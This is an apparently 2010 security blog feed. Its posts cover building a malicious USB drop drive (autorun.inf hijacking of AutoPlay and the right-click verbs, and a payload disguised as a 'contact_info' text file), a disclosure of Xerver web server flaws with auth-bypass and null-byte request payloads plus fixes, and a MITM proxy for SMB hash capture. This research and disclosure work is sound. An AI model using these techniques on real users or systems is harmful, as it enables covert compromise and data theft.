the quick and easy solution is to simply write a batch file that checks
the %PROCESSOR_ARCHITECTURE% environment variable and runs the
corresponding payload. There are plenty of other ways to do it too, but
this method is pretty straightforward.&lt;/p&gt;
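&lt;p&gt;The dispatch logic is trivial; here it is sketched in Python rather than batch, with hypothetical payload filenames:&lt;/p&gt;

```python
# Same idea as the batch file: pick a payload based on the Windows
# PROCESSOR_ARCHITECTURE variable. Payload filenames are hypothetical.
import os

def pick_payload(env=None):
    if env is None:
        env = os.environ
    arch = env.get("PROCESSOR_ARCHITECTURE", "x86")
    # 64-bit Windows reports AMD64 (or IA64 on old Itanium builds)
    if arch in ("AMD64", "IA64"):
        return "payload64.exe"
    return "payload32.exe"

print(pick_payload({"PROCESSOR_ARCHITECTURE": "AMD64"}))  # payload64.exe
```

&lt;p&gt;One caveat: a 32-bit process on 64-bit Windows sees PROCESSOR_ARCHITECTURE as x86 (the real value then lives in PROCESSOR_ARCHITEW6432), so depending on how your launcher gets started you may want to check both.&lt;/p&gt;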
&lt;/div&gt;
&lt;div class="section" id="packing-into-a-single-executable"&gt;
&lt;h2&gt;Packing Into a Single Executable&lt;/h2&gt;
&lt;p&gt;For a social engineering attack I will describe later, I wanted to be
able to pack a text file, a payload, and a tiny batch file that runs
both into a single executable. This is where Quick Batch File Compiler
came in. Although a rather obscure, and slightly shady, application, it
was able to do four things that are very useful: embed a batch file in
an executable (obviously), customize the generated executable with
description text and icon, compress and pack any other necessary files
inside the executable, and (also very importantly) run the executable in
what it calls &amp;quot;ghost mode&amp;quot; (which basically means that no windows are
created). You could pretty easily do all of these things on your own
using &lt;a class="reference external" href="http://download.cnet.com/Resource-Hacker/3000-2352_4-10178587.html"&gt;Resource Hacker&lt;/a&gt;, &lt;a class="reference external" href="http://www.petri.co.il/create_executable_with_iexpress.htm"&gt;iexpress&lt;/a&gt;, and/or a little bit of C, but why
do work someone has already done for you? There is one drawback to using
QBFC: any application compiled in Ghost Mode (with the free version)
displays a nag screen every time you run it. I will leave it as an
exercise for the reader to figure out how to use Olly (or your favorite
debugger) to bypass said issue. Hint: you only need to change a single
byte.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="weaponizing-the-drive"&gt;
&lt;h2&gt;Weaponizing the Drive&lt;/h2&gt;
&lt;p&gt;Once I had a sufficiently invisible and properly packaged payload that
would run anywhere, I was ready to weaponize the drive. Now, there are
two classic approaches to doing this: either through the use of a U3
drive to exploit AutoRun, or through various social engineering avenues
that AutoPlay and Windows provide us. For mine, I decided to take
advantage of both.&lt;/p&gt;
&lt;div class="section" id="abusing-u3"&gt;
&lt;h3&gt;Abusing U3&lt;/h3&gt;
&lt;p&gt;The U3 vector is pretty straightforward to exploit, and you can see how
I went about exploiting it if you look at the autorun.inf in the U3
directory in my source package. All you really need to do is make sure
that the open command in the autorun.inf file points to your desired
payload, and you are good to go. There are a couple other very useful
things that you can do (as you can see in the file), but I will discuss
these in the next section. Once you've made your autorun.inf, take it,
your icon file, and your malicious executable (I have not supplied one,
for obvious reasons), and throw it into the U3CUSTOM folder in the
extracted UniversalCustomizer folder. Then simply run the ISOCreate
batch file, insert your U3 drive, run the Universal_Customizer.exe
file, and walk through the steps. Once you're done, you should have a
brand new, hard to detect, malicious U3 payload that runs silently in
the background on XP.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="abusing-autoplay"&gt;
&lt;h3&gt;Abusing AutoPlay&lt;/h3&gt;
&lt;p&gt;Now that I had a payload that would run on many computers that aren't
locked down sufficiently, I also needed some backup plans, in the
probable case that I encountered machines with a competent system
administrator. This is where AutoPlay abuse and executable resource
hacking come into play. The main problem to address here is how to trick
a user into running our backdoor for us, even when they are protected by
stronger-than-ordinary security policies.&lt;/p&gt;
&lt;p&gt;As I alluded to earlier, there are a couple of fun, useful tricks that
one can do to use AutoPlay to their advantage. The classic one (and one
that has been exploited quite effectively by the &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Conficker"&gt;Conficker worm&lt;/a&gt;) is
to set a default action for the drive that looks exactly like Windows'
normal &amp;quot;Open folder to view files&amp;quot; command. When AutoPlay then pops up,
the user (on Windows XP) is presented with a default option to &amp;quot;Open
folder to view files&amp;quot; that looks almost exactly like the original one,
but that now runs our malicious payload.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/autoplay1.png"&gt;&lt;img alt="autoplay example 1" src="https://spareclockcycles.org/wp-content/uploads/2010/11/autoplay1-280x300.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;We can also use this same social engineering trick on the Windows 7 U3
autorun. Windows 7 has significantly locked down USB security, but CD
security (which is what matters in the U3 attack) is still somewhat
lacking. Although the payload no longer runs silently, the user is
presented with a prompt asking them if they want to view the files with
our malicious payload.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/win72.png"&gt;&lt;img alt="image1" src="https://spareclockcycles.org/wp-content/uploads/2010/11/win72-300x263.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Beyond this attack, we can also set what are known as shell commands,
more commonly known as the right click options for the drive. Windows,
in its infinite wisdom, decided it was a good idea to allow devices to
override the default shell commands if they so desired. By overriding
the &amp;quot;Open&amp;quot;, &amp;quot;Explore&amp;quot;, and &amp;quot;Search...&amp;quot; commands, we can not only all but
ensure that any user trying to evade AutoPlay by opening the drive
through a right click command will still be compromised, but in a
convenient twist, we also override the default double-click command.
This means that basically any interaction directly through the drive
icon will result in code execution. In fact, the only way I have found
to get into the drive once the autorun.inf file has been processed is to
browse in manually through the Folders sidebar or by selecting the
proper (non-default) &amp;quot;Open folder to view files&amp;quot; command at the AutoPlay
prompt. It is unlikely that a user will do things this way, so we can be
fairly confident that if AutoPlay isn't disabled (on XP at least) and
the user tries to view the files, we will get code execution.&lt;/p&gt;
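&lt;p&gt;Put together, the relevant parts of such an autorun.inf look roughly like this (the filenames are placeholders, and the verbs shown are just the common ones; see the copy in my source package for the real configuration):&lt;/p&gt;

```ini
[AutoRun]
; launch.exe and drive.ico are placeholder names
open=launch.exe
icon=drive.ico
; fake the default "Open folder to view files" AutoPlay entry
action=Open folder to view files
; override the right-click (and thus double-click) verbs;
; Explore and Search can be overridden the same way
shell\open\command=launch.exe
shell\explore\command=launch.exe
shell=open
```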
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/autoplay2.png"&gt;&lt;img alt="image2" src="https://spareclockcycles.org/wp-content/uploads/2010/11/autoplay2.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-social-engineering-component"&gt;
&lt;h3&gt;The Social Engineering Component&lt;/h3&gt;
&lt;p&gt;However, XP is not the only Windows operating system, and AutoPlay very
well might be disabled by a good system admin (or, as I found out, by
certain antivirus products -&amp;gt; AntiVir). If this is the case, then we
need to rely on good ol' social engineering to get the user to click our
file. Now, there are a ridiculous number of ways to do this, from
labeling something &amp;quot;FREE_TACOS.JPG.EXE&amp;quot; or
&amp;quot;BRItANy_SPares_NAk3d!!1one.avi.exe&amp;quot; to just putting a bunch of inane
files, all backdoored, and hoping the user gets curious. For my
approach, I decided to again work off the assumption that the attack
drive would be used in a USB drop, where a drive is &amp;quot;lost&amp;quot; in a heavily
trafficked area, with the hope that someone will find it and plug it
straight into their computer.&lt;/p&gt;
&lt;p&gt;With this particular attack as my starting point, I decided that one of
the most likely things someone would click on would be the
contact information of whoever owns the drive. Hence, my solution: make an
executable that looks as much like a text document as possible named
&amp;quot;contact_info&amp;quot;, that opens a text document with contact information in
it, but also runs my malicious code in the background, unknown to the
helpful user. Not only do I then get code execution, but the kindly user
can then return the drive to me (if I decide I want to risk putting my
actual contact info on the drive, which is certainly not a given). With
QBFC, it was trivial not only to add in the default text file icon as
the executable's icon, but also to edit the company and version information
to say &amp;quot;Text Document&amp;quot; and &amp;quot;1 KB&amp;quot; respectively, which Windows then
kindly displays in the same manner as a normal text document's size and
filetype information. In addition, I only needed to add a single start
command and embed a text file to make the application appear to simply
open Notepad.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/socialengineer.png"&gt;&lt;img alt="Text File Example" src="https://spareclockcycles.org/wp-content/uploads/2010/11/socialengineer-300x224.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This technique does not work as effectively on Windows 7, as Microsoft
changed the file information displayed by default (it now correctly says
that it is an executable), but it remains an enticing
file,&amp;nbsp;especially&amp;nbsp;with the text file icon still in place.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/11/win7.png"&gt;&lt;img alt="image4" src="https://spareclockcycles.org/wp-content/uploads/2010/11/win7-300x225.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusions"&gt;
&lt;h2&gt;Conclusions&lt;/h2&gt;
&lt;p&gt;And there you have it: how I developed my USB Stick O' Death, from start
to finish. It's not the be-all end-all of malicious USB drives, as the
name might imply, but it does provide a down-and-dirty example of how to
achieve silent and reliable code execution using USB exploitation
quickly and easily. Because I have now published these techniques, it is
likely that detection rates for my specific method will go up
significantly. However, I hope that I have illustrated just how easy it
is to bypass current antivirus detection mechanisms with a little
thought and a few lines of C, so that it is trivial for you, the reader,
to make them undetectable once again. For myself, writing up this post
took significantly longer than actually doing the work, if that gives
you any idea of how long it took me to do all of this.&lt;/p&gt;
&lt;p&gt;In addition, I hope this has raised awareness on just how trivial it is
to use U3, AutoPlay, and social engineering to get users to run
malicious code. I know that I certainly learned a few things
(specifically, not to use the Explore shell command to open drives). It
is clear to me that the only real way to prevent these kinds of attacks,
barring some big changes from Microsoft, is to disable or greatly limit
USB drives on most networks, and to educate people (possibly through the
demonstration of this drive) just how easy it is to go from plugging in
a USB drive to an attacker having full access to their computer. Even
with proactive steps to counteract these attacks, it is likely, given
the current state of USB security, that these attacks will continue to
be effective well into the foreseeable future.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="autoplay"></category><category term="autorun"></category><category term="death"></category><category term="linux"></category><category term="metasploit"></category><category term="meterpreter"></category><category term="social engineering"></category><category term="usb"></category><category term="windows"></category></entry><entry><title>RevDNS 0.30 Release</title><link href="https://spareclockcycles.org/2010/08/22/revdns-0-30-release.html" rel="alternate"></link><updated>2010-08-22T17:38:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-08-22:2010/08/22/revdns-0-30-release.html</id><summary type="html">&lt;p&gt;Hey all,&lt;/p&gt;
&lt;p&gt;Today I posted &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/revdns/revdns_cur.tar.gz"&gt;RevDNS v0.30&lt;/a&gt;, an update to the multi-threaded Python
script based on dnspython that I wrote for quickly doing reverse DNS
scans of IP blocks. Version 0.30 adds some new features, and fixes a few
bugs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;New Features&lt;/strong&gt;&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Improved threading system, based on the use of a lockable iterator.
(translation: faster lookups)&lt;/li&gt;
&lt;li&gt;Specify target DNS server(s).&lt;/li&gt;
&lt;li&gt;Specify arbitrary DNS settings via custom resolv.conf file (*nix
only)&lt;/li&gt;
&lt;li&gt;Set number of retries on timeout error. Setting this greatly reduces
the number of missed hosts.&lt;/li&gt;
&lt;li&gt;Select TCP or UDP as the DNS transport protocol.&lt;/li&gt;
&lt;li&gt;Now handles rare but valid instances where an IP address has multiple
PTR records.&lt;/li&gt;
&lt;/ul&gt;
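&lt;p&gt;For those wondering what a &amp;quot;lockable iterator&amp;quot; buys you: worker threads pull the next IP straight from a shared iterator under a lock, instead of pre-splitting the range or funneling everything through a queue. A minimal sketch of the idea (not RevDNS's actual code):&lt;/p&gt;

```python
# Sketch of a lockable iterator: threads share one iterator and hold the
# lock only long enough to grab the next item. Not RevDNS's actual code.
import threading

class LockedIterator:
    def __init__(self, iterable):
        self._it = iter(iterable)
        self._lock = threading.Lock()

    def __iter__(self):
        return self

    def __next__(self):
        with self._lock:
            return next(self._it)  # StopIteration propagates to the caller

ips = LockedIterator("10.0.0.{}".format(i) for i in range(1, 4))
print(list(ips))  # ['10.0.0.1', '10.0.0.2', '10.0.0.3']
```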
&lt;p&gt;&lt;strong&gt;Bug Fixes&lt;/strong&gt;&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Fixed issue with Python xrange function, which would crash the
program in certain circumstances.&lt;/li&gt;
&lt;li&gt;Related to the above, added support for OSX. Thanks to Justin
Morehouse for the bug report.&lt;/li&gt;
&lt;li&gt;Fixed problem with regex not matching certain addresses during IP
verification.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As always, feel free to submit bug reports and feature requests if you
have any issues whatsoever. Patches are also greatly appreciated.&lt;/p&gt;
&lt;p&gt;UPDATE 08/22/2010: All, it appears I linked to some testing code rather
than the final revision. The link has been fixed, sorry about the
mix-up.&lt;/p&gt;
</summary></entry><entry><title>Multiple Vulnerabilities in Xerver 4.32</title><link href="https://spareclockcycles.org/2010/08/01/multiple-vulnerabilities-in-xerver-4-32.html" rel="alternate"></link><updated>2010-08-01T01:05:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-08-01:2010/08/01/multiple-vulnerabilities-in-xerver-4-32.html</id><summary type="html">&lt;p&gt;Sorry for the downtime everyone! I've been quite busy this summer, but
I'm back now, and I've got vulnerabilities for everybody! Well,
everybody who's looking for vulnerabilities in Xerver web server at
least.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://www.javascript.nu/xerver/"&gt;Xerver&lt;/a&gt; is a web server written in Java and appears to be targeted at
Windows users (although it is cross platform). Xerver is apparently the
&lt;a class="reference external" href="http://www.google.com/search?q=free+web+server"&gt;first result&lt;/a&gt; for &amp;quot;free web server&amp;quot; on Google, even edging out Apache.
How it got up there, I will never know, but it makes me doubt Google's
search gnomes' abilities. With &lt;a class="reference external" href="http://download.cnet.com/Xerver-Free-Web-Server/3000-10248_4-10074595.html"&gt;~125,000 downloads on Cnet&lt;/a&gt; though, I
guess it isn't completely obscure.&lt;/p&gt;
&lt;p&gt;I spent a couple of my slower evenings looking over the code, and I came
across a number of serious vulnerabilities in Xerver. These
vulnerabilities include insecure default settings, denial of service,
HTTP authentication bypass, source disclosure, very minor directory
traversal, and limited (for now) remote code execution. These are in
addition to a number of unpatched vulnerabilities already discovered by
other researchers, the most serious being an &lt;a class="reference external" href="http://www.securityfocus.com/bid/36454"&gt;authentication bypass on
the configuration pages&lt;/a&gt; (remote configuration disabled by default), a
different &lt;a class="reference external" href="http://www.exploit-db.com/exploits/9649/"&gt;source disclosure vulnerability&lt;/a&gt;, and an &lt;a class="reference external" href="http://www.juniper.net/security/auto/vulnerabilities/vuln37064.html"&gt;HTTP response
splitting attack&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This post will document the issues I found, as well as some fixes. For
the impatient, you can just skip my explanations and grab my &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/xerver_source_disclosure.rb"&gt;PoC
Metasploit module&lt;/a&gt; for the authentication bypass and the source
disclosure. Note that I have not yet released the remote code execution
PoC, for reasons explained at the end of this post.&lt;/p&gt;
&lt;div class="section" id="responsible-disclosure"&gt;
&lt;h2&gt;Responsible Disclosure&lt;/h2&gt;
&lt;p&gt;I contacted Xerver's lead developer, Omid Rouhani, as soon as I found
these issues, and received an email back from him requesting a patch. I
provided a patch that fixes the issues that I found that are not
design-related, but he has yet to publish the fixes (it's been over 2
weeks now). I feel that it is best that users know the vulnerabilities
exist (as they are made much worse by insecure configurations) so that
they can take appropriate actions. Concerned users can grab my patched
source &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/XerverSource.zip"&gt;here&lt;/a&gt;. The patched version addresses the HTTP authentication
bypass, source disclosure, and HTTP response splitting vulnerabilities.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="insecure-default-settings"&gt;
&lt;h2&gt;Insecure Default Settings&lt;/h2&gt;
&lt;p&gt;A large majority of users will, without fail, simply use the default
application settings, so it is common practice to try and make these
settings as secure as possible, and warn users if they try to make them
less so. Xerver, however, seems to have gone out of its way to have the
most insecure default settings possible. That is the only explanation
for some of the atrocious configuration choices I found. These issues
were present in both the initial, clean install settings and in the
default settings chosen by the provided setup wizard.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Directory listings are enabled by default. This is not *generally*
a huge problem as long as everything else is securely set up.&lt;/li&gt;
&lt;li&gt;The default root directory is C:\ . This means that unauthenticated
users have access to everything on the drive that the user who
started the Xerver process does (most likely an administrator),
meaning configuration files, private user data, and pretty much
anything else you'd want become world accessible. And to make things
worse, combined with directory listings, it's as easy as navigating
the file system to the file you want.&lt;/li&gt;
&lt;li&gt;The configuration page has no password protection. It is not remotely
available by default, but when configured this way it represents a
significant vulnerability (that would allow an attacker to get code
execution).&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="denial-of-service"&gt;
&lt;h2&gt;Denial of Service&lt;/h2&gt;
&lt;p&gt;You know denial of service is going to be a problem when one of the first
comments you read in the code says &amp;quot;If someone creates 150 connections
to this server, no one else will be able to connect to us anymore.&amp;quot; I
documented three DoS vectors that I found right away, but there are
definitely more.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Open 150 connections very quickly. Easy enough.&lt;/li&gt;
&lt;li&gt;Inject a null byte into the appropriate place to convince the server
to access a file that &amp;quot;exists&amp;quot; but doesn't actually exist. Causes the
thread to hang indefinitely, making the DoS easier.&lt;/li&gt;
&lt;li&gt;Run an application that doesn't quit without user input, which also
hangs the thread, this time for 5 minutes.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="authentication-bypass"&gt;
&lt;h2&gt;Authentication Bypass&lt;/h2&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Xerver does provide the ability to password protect directories with basic HTTP Auth; however, this protection was very easily circumvented in most circumstances. To do this, one must simply use two slashes (orbackslashes) on the front of the GET request string instead of the normal one forward slash, and as long as the password protected directory is not a.) the root directory AND b.) recursively protected, the read will succeed. Code:&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;`` GET //protected_folder/protected_file.txt HTTP/1.1``&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The reason this works is a bug in the code at
NewConnection-&amp;gt;accessToFolderIsOK. Xerver compares the folder being
requested against its internal list of protected folders by looping through
each, and comparing the two strings. If they're equal, then the folder
requires password protection, and the auth routine is entered. However,
it was possible to bypass the auth routine entirely with a string that
did not match the stored folder byte-for-byte (two slashes rather than
one), but still allowed Java (through the Windows API) to find and read
the file. To solve this issue, Xerver should normalize its
input paths to a single standard separator character, rather than
letting anything and everything through. This is fixed in my patch.&lt;/p&gt;
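&lt;p&gt;The bug and the fix are easy to demonstrate. Here is the comparison logic reduced to a few lines of Python (Xerver itself is Java, and the function names are mine):&lt;/p&gt;

```python
# The flawed check compares the raw request path byte-for-byte against the
# protected list; the fix normalizes separators first. Names are illustrative.
import posixpath

PROTECTED = ["/protected_folder"]

def requires_auth_buggy(path):
    return any(path.startswith(p) for p in PROTECTED)

def requires_auth_fixed(path):
    # Collapse backslashes and leading slash runs, then resolve "." and ".."
    cleaned = "/" + path.replace("\\", "/").lstrip("/")
    norm = posixpath.normpath(cleaned)
    return any(norm.startswith(p) for p in PROTECTED)

print(requires_auth_buggy("//protected_folder/secret.txt"))  # False: bypassed
print(requires_auth_fixed("//protected_folder/secret.txt"))  # True
```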
&lt;p&gt;In addition to this vulnerability, the method of checking usernames and
passwords that Xerver uses is insecure. Rather than looking up the
username in the username/password file and then checking to see if the
provided password matches the given password, Xerver loops through all
the known passwords and, if it finds a match, allows us to log in with
that username. This means that a.) we don't need to know a username and
b.) we only have to guess the weakest password. Not good.&lt;/p&gt;
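&lt;p&gt;In other words, the check behaves like the first function below when it should behave like the second (a sketch, not Xerver's Java):&lt;/p&gt;

```python
# Why matching against "any password in the file" is broken: an attacker
# needs no username and only has to guess the single weakest password.
# Credentials here are illustrative.
CREDS = {"alice": "hunter2", "bob": "s3cret"}

def login_buggy(_username, password):
    # Xerver-style: scan all stored passwords for any match.
    return password in CREDS.values()

def login_fixed(username, password):
    # Look up the username first, then compare its password.
    return CREDS.get(username) == password

print(login_buggy("mallory", "hunter2"))  # True: any username works
print(login_fixed("mallory", "hunter2"))  # False
```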
&lt;/div&gt;
&lt;div class="section" id="null-byte-injection"&gt;
&lt;h2&gt;Null Byte Injection&lt;/h2&gt;
&lt;p&gt;The following two and a half vulnerabilities are due to a null byte
injection vulnerability. My patch should fix these as well.&lt;/p&gt;
&lt;div class="section" id="full-source-disclosure"&gt;
&lt;h3&gt;Full Source Disclosure&lt;/h3&gt;
&lt;p&gt;A classic source disclosure vulnerability, this one relies on a null
byte injection vulnerability to trick Xerver into coughing up any
accessible files in plain text. The trick relies on Java's handling of
strings. When looking up the mime-type of the file, Xerver uses Java's
find function to search for the last &amp;quot;.&amp;quot; in the requested document
string and pull out the file extension. If a null byte is injected in
our string, Java (unlike C) treats it as any other character; it's
simply a byte to be checked. However, when Java goes to open and read
the file, it has to make an external API call which uses (you guessed
it) C strings. This causes our original file to be read, but handled as
the mime-type of our choosing.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
GET /admin.php\x00.txt HTTP/1.1
&lt;/pre&gt;
&lt;p&gt;Although the Xerver source indicates that at least some measures were taken to
prevent this (%00 is interpreted as the end of the string), it does not
take into account that a malicious client could simply inject a null
byte directly into the string. To fix this, Xerver should obviously be
checking for and removing null bytes from input.&lt;/p&gt;
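&lt;p&gt;The string-handling mismatch is easy to reproduce: Python strings treat a NUL the way Java's do, so a couple of lines show exactly what each layer sees (the path is illustrative):&lt;/p&gt;

```python
# A NUL is just another character to the Java-style extension lookup, but a
# C-string file API stops reading at it. The path is illustrative.
req = "/admin.php\x00.txt"

ext = req[req.rfind("."):]       # what the mime-type lookup sees
c_path = req.split("\x00")[0]    # what the C-level file API actually opens

print(repr(ext), repr(c_path))   # '.txt' '/admin.php'
```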
&lt;/div&gt;
&lt;div class="section" id="filetype-restriction-bypass"&gt;
&lt;h3&gt;Filetype Restriction Bypass&lt;/h3&gt;
&lt;p&gt;This vulnerability works exactly the same as the source disclosure, only
the goal is to bypass restrictions on what filetypes are allowed to be
served. By default, Xerver will serve you anything you request. However,
you can explicitly set certain files, like &amp;quot;.exe&amp;quot; files, to not be
accessible. If, for instance, someone configured Xerver to disallow exe
files but not bat files, we could still send GET /test.exe\x00.bat (with
a raw null byte, obviously), and Xerver would happily let us execute our
command anyway, for the same reason it would serve us PHP files as text.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="minor-directory-transversal-issue"&gt;
&lt;h3&gt;Minor Directory Traversal Issue&lt;/h3&gt;
&lt;p&gt;This problem was very strongly protected against (especially compared to
the rest of the issues) because another researcher found this particular
bug in an earlier version, and a decent patch was made. That being said,
I was still able to list a directory above the root directory using the
same null character injection technique used on the previous two bugs.
This works because Xerver searches the string to find any occurrences of
/../ , but if a null byte is injected between the .. and / it won't be
detected, and the directory immediately above the root directory will be
listed if directory listing is enabled.&lt;/p&gt;
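&lt;p&gt;The filter failure is the same class of bug, reduced to two lines (a sketch):&lt;/p&gt;

```python
# A literal "/../" scan misses the sequence when a NUL sits between the dots
# and the slash, even though the C-level API, stopping at the NUL, still
# sees "/.." and steps above the root.
payload = "/..\x00/"

print("/../" in payload)                      # False: filter bypassed
print("/../" in payload.replace("\x00", ""))  # True: strip NULs first
```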
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="remote-code-execution"&gt;
&lt;h2&gt;Remote Code Execution&lt;/h2&gt;
&lt;p&gt;With these bugs (and the ones discovered by previous researchers) it is
possible to get remote code execution on many Xerver installations. I
have written a Metasploit module that can execute code on these systems;
however I am delaying a bit before releasing it to a.) possibly
polish/refine the attack more and b.) to give users time to fix their
installations. To prevent code execution, do NOT share your root
directory, do not make the administrative panel remotely accessible, and
do not allow execution of exe or bat files. My patch will not solve this
issue, as it is configuration specific.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>High Gain Wifi Antenna for Under $10</title><link href="https://spareclockcycles.org/2010/06/10/high-gain-wifi-antenna-for-under-10.html" rel="alternate"></link><updated>2010-06-10T21:03:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-06-10:2010/06/10/high-gain-wifi-antenna-for-under-10.html</id><summary type="html">&lt;p&gt;Sorry, no proxy fun quite yet. All in due time. I wanted to let everyone
know about &lt;a class="reference external" href="http://cirictech.com/?p=287"&gt;an interesting post&lt;/a&gt; that my friend Ciric over at
&lt;a class="reference external" href="http://cirictech.com/"&gt;cirictech.com&lt;/a&gt; just put up documenting how he went about building a
wifi antenna for me back during finals week. He made it out of a piece
of wood, a coat hanger, some coax, and an SMA connector. Very cheap, but
surprisingly effective: in our tests, it gave us very good gain, pulling
in strong signals from access points half a mile away. It's
worth a look if you're in the market for a wifi antenna, or if you go
wardriving on a regular basis.&lt;/p&gt;
</summary></entry><entry><title>Code And Such</title><link href="https://spareclockcycles.org/2010/06/10/code-and-such.html" rel="alternate"></link><updated>2010-06-10T17:36:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-06-10:2010/06/10/code-and-such.html</id><summary type="html">&lt;p&gt;&lt;strong&gt;Released and Under Active Development&lt;/strong&gt;&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2010/04/25/updated-reverse-dns-tool/"&gt;Fast Reverse DNS Lookups using Python&lt;/a&gt; (code &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/revdns/revdns_cur.tar.gz"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2010/05/14/hiding-services-from-nmap/"&gt;Alternate Port Finder&lt;/a&gt; (code
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/find-ports.tar.gz"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2011/07/10/sergio-proxy-v0-2-released/"&gt;Sergio Proxy (a Super Effective Regexer of Gathered Inputs and
Outputs)&lt;/a&gt; (code &lt;a class="reference external" href="http://code.google.com/p/sergio-proxy/"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener/"&gt;d0z.me: The Evil URL Shortener&lt;/a&gt; (code
&lt;a class="reference external" href="http://code.google.com/p/d0z-me/"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2011/09/18/exploitring-the-wordpress-extension-repos/"&gt;wpfinger: An advanced Wordpress plugin fingerprinter&lt;/a&gt;&amp;nbsp;(code
&lt;a class="reference external" href="http://code.google.com/p/wpfinger/"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
</summary></entry><entry><title>Sergio Proxy - Injecting, Modifying, and Blocking HTTP Traffic</title><link href="https://spareclockcycles.org/2010/06/10/sergio-proxy-released.html" rel="alternate"></link><updated>2010-06-10T17:25:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-06-10:2010/06/10/sergio-proxy-released.html</id><summary type="html">&lt;p&gt;Edit: You can grab new releases of this tool
here:&amp;nbsp;&lt;a class="reference external" href="https://code.google.com/p/sergio-proxy/downloads/list"&gt;https://code.google.com/p/sergio-proxy/downloads/list&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I've gotten all settled in my new place (finally), so I figured I should
get caught up on my blog again. Lots of posts coming soon, I promise!&lt;/p&gt;
&lt;p&gt;Today, I'm releasing a tool that I'll be working on (and with) a lot
this summer that I'm calling Sergio Proxy: a Super Effective Regexer of
Gathered Inputs and Outputs (download &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/sergio_proxy_v0.1.tar.gz"&gt;here&lt;/a&gt;). Yeah, yeah, I know:
there are a billion other HTTP proxies out there that are way better
than mine that I should be using instead. I know all about them; I just wanted to make
one myself. It's an interesting project, and I've learned a lot about
HTTP proxies and the &lt;a class="reference external" href="http://twistedmatrix.com/trac/"&gt;Twisted networking framework&lt;/a&gt; in the process. In
addition, this tool has made it *much* easier for me to use Python to
work with data captured from MITM'd HTTP connections than the other
tools that I experimented with. I also blindly stumbled into an awesome
topic for my next post too, to be released in the next few days (I'm
particularly excited for this one). A big fat warning before we go on
though: this is a very alpha release, so don't have your hopes way up.
It still has a long way to go (like adding HTTPS support...:P).&lt;/p&gt;
&lt;p&gt;So why did I originally start on this project? Mainly because &lt;a class="reference external" href="http://www.irongeek.com/i.php?page=security/ettercapfilter"&gt;Ettercap
filters suck&lt;/a&gt;. I mean, really suck. Now, don't get me wrong, they can
be useful in some situations, but automatically injecting data into HTTP
sessions is not one of them. &amp;nbsp;So why did I need Ettercap filters to
inject data into HTTP sessions? Why, to attack SMB servers by means of
challenge-hash cracking of course.&lt;/p&gt;
&lt;p&gt;The attack works by injecting specially crafted HTML into a page that
the victim is requesting that references a file located on a local samba
server. &amp;nbsp;The browser will then automatically try to authenticate with
the remote server using its current user's credentials, exposing
challenge hashes of the user's password on the wire, the first 7
characters of which can then be cracked with rainbow tables. &amp;nbsp;To do
this, we obviously need to first be in a position where we can modify
the network traffic, which we can easily do using various methods (the
